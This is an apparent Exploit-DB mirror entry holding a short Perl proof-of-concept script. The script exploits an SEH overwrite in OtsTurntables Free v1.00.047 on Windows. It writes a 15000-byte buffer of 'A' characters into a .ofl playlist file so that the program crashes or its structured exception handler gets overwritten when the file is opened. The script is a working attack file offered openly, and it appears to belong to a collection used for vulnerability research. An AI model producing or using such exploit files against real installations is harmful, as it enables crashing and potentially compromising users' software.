exploit-db-mirror/exploits/windows/dos/11145.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
494 B
Perl
Executable file

# Exploit Title: OtsTurntables Free v1.00.047 SEH Overwrite POC
# Date: 14-01-2010
# Author: Darkb0x
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on: Windows Vista Ultimate English
# [exploit code]
print "\n\nBy Darkb0x\n" ;
print "Home Page :\n" ;
print "http://NullArea.Net\n" ;
my $junk = "\x41" x 15000 ;
my $exploit = $junk;
open (file,">>file.ofl");
print file $exploit;
close (file);
print "\n\n\nFile Creation done\n";